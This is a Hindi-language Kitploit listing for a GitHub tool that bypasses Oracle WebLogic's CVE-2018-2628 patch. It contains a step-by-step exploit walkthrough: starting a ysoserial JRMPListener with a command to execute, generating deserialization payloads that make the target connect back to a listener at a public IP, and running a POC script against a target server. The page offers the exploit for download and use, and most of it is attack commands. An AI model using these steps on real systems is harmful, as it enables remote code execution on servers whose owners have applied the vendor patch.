Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/tdy218/ysoserial-cve-2018-2628
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubtdy218/ysoserial-cve-2018-2628

ysoserial-cve-2018-2628

Oracle WebLogic CVE-2018-2628 पैच को बायपास करने के लिए कुछ कोड

रिपॉजिटरी देखें
1144838 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ysoserial-cve-2018-2628

0x1. तैयारी

  • POC स्क्रिप्ट, Payload Object जनरेशन और JRMPListener चलाने के लिए आवश्यक सॉफ्टवेयर वातावरण तैयार रखें Python 2.7.x Oracle Java SE 1.7+
  • Patch Set Update 180417 पैच इंस्टॉल किया हुआ एक WebLogic Server 10.3.6 वातावरण तैयार रखें (केवल AdminServer ही काफी है) यदि पहले से ही इस PSU वर्जन का WebLogic वातावरण उपलब्ध है, तो इस चरण को छोड़ा जा सकता है।
  • POC टूल तैयार रखें इस प्रोजेक्ट से POC स्क्रिप्ट (wls-cve-2018-2628-poc.py) डाउनलोड करें इस प्रोजेक्ट के release पेज से Payload Object जनरेशन और JRMPListener प्रोग्राम का jar फ़ाइल पैकेज (ysoserial-<version>-cve-2018-2628-all.jar) डाउनलोड करें

0x2. JRMPListener चलाएं

कमांड फॉर्मेट:

java -cp ysoserial-<version>-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener <listen port> <gadget class> <command>

उदाहरण:

java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener 22801 Jdk7u21 "calc.exe"

जब *Opening JRMP listener on 22801 आउटपुट दिखाई दे, तो JRMPListener होस्ट का IP पता (उदाहरण में यह एक Alibaba Cloud ECS होस्ट पर चल रहा है जिसका सार्वजनिक IP 47.94.158.125 है) और निर्दिष्ट पोर्ट नोट कर लें।

0x3. पिछले चरण में JRMPListener होस्ट के IP पते और पोर्ट जानकारी के आधार पर Payload String जनरेट करें

वर्तमान में दो ज्ञात विधियाँ हैं (Payload Object String जनरेट करते समय नीचे दी गई दोनों में से कोई एक चुनें):

  • java.rmi.activation.Activator का उपयोग [CVE-2017-3248]

Payload Object String जनरेट करने का कमांड फॉर्मेट:

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient2 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

उदाहरण:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient2 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

नमूना (JRMPClient2 से जनरेट किया गया Payload object बाइनरी आउटपुट):

  • weblogic.jms.common.StreamMessageImpl का उपयोग कर java.rmi.registry.Registry को एन्कैप्सुलेट करें

Payload Object String जनरेट करने का कमांड फॉर्मेट:

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient3 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

उदाहरण:

java -jar ysoserial-0.1-cve-2018-2628-all.jar JRMPClient3 47.94.158.125:22801 | xxd -p | tr -d $'\n' && echo

नमूना (JRMPClient3 से जनरेट किया गया Payload object बाइनरी आउटपुट):

0x4. POC स्क्रिप्ट को संपादित और चलाएं

wls-cve-2018-2628-poc.py को संपादित करें, पिछले चरण में जनरेट किए गए hex स्ट्रिंग को स्क्रिप्ट के शीर्ष पर रखे गए payload_str वेरिएबल के मान से बदलें (इस स्क्रिप्ट में पहले से मौजूद दोनों payload_str वेरिएबल के मान सीधे उपयोग किए जा सकते हैं, जो उपरोक्त दो विधियों से जनरेट किए गए hex स्ट्रिंग के अनुरूप हैं)।

कमांड फॉर्मेट:

python wls-cve-2018-2628-poc.py <लक्ष्य WebLogic Server इंस्टेंस का सुनने वाला IP> <लक्ष्य WebLogic Server इंस्टेंस का सुनने वाला पोर्ट>

उदाहरण:

python wls-cve-2018-2628-poc.py 192.168.64.83 7001

नमूना (Patch Set Update 180417 इंस्टॉल किया हुआ):

0x5. आभार

xxlegend@nsfocus (CVE-2018-2628 की खोज करने वालों और प्रस्तुतकर्ताओं में से एक, जिन्होंने शोषण तकनीक और संबंधित कोड उदाहरण प्रकट किए) badcode@knownsec (weblogic.jms.common.StreamMessageImpl का उपयोग कर java.rmi.registry.Registry को एन्कैप्सुलेट करने का कोड उदाहरण प्रदान किया) ysoserial प्रोजेक्ट (कई Java deserialization शोषण प्रोग्रामों का संकलन)

टूल डाउनलोड करें